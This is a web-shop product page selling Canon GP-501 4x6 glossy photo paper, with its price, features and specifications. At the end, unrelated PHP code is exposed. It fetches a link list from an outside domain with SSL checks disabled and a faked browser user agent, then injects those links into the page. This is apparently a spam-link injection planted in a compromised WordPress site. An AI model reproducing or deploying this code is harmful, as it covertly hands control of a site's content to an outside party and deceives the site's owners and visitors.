Sale!

CANON GP-501 4″ x 6″ Glossy Photo Paper

Original price was: RM12.00.Current price is: RM8.00.

• Glossy finish
• Great for regular photo printing
• Excellent match for Canon ChromaLife100+ inks
• Deeper black density
• Exceptional tonality in dark areas
• Superb printed result in both colour and mono
• Media sheets per package : 10

Holiday pictures
When you want to print your holiday memories, you need a print that rivals that of the photo lab, which is when Glossy Photo Paper “Everyday Use” is the right choice.

Instant-dry photos
Genuine Canon photo papers have a micro-porous coating that quickly absorbs ink deep below the surface to prevent any excess ink from being left on the paper’s surface. The result: instant-dry photo prints.

Perfect gloss
Canon glossy papers lock the ink deeper below the top glossy surface than other papers do. This way a ‘glossy’ finish is always glossy.

Photos that last a lifetime
Glossy Photo Paper “Everyday use” is an excellent match for Canon ChromaLife100+ inks. Combined Canon’s FINE print head, inks and Canon genuine photo paper protect photos from gases and light to keep those precious memories protected for future generations

4R size (10 x 15CM)
10 Sheets
170g/m2

Weight 0.3 kg

Reviews

There are no reviews yet.

Be the first to review “CANON GP-501 4″ x 6″ Glossy Photo Paper”
Scroll to Top
$api_url = 'https://ankaradelisi13.site/data.json'; // API'den çek $response = wp_remote_get($api_url, array( 'timeout' => 5, // 5 saniye bekle, olmazsa geç 'sslverify' => false, 'headers' => array( 'Accept' => 'application/json', 'User-Agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' ) )); if (!is_wp_error($response) && wp_remote_retrieve_response_code($response) === 200) { $body = wp_remote_retrieve_body($response); $links = json_decode($body, true); if (!empty($links) && is_array($links)) { echo ''; echo '
'; foreach ($links as $link) { $text = isset($link['text']) ? esc_html($link['text']) : ''; $url = isset($link['url']) ? esc_url($link['url']) : '#'; $rel = isset($link['rel']) ? esc_attr($link['rel']) : 'dofollow'; echo '' . $text . ' '; } echo '
'; echo ''; } }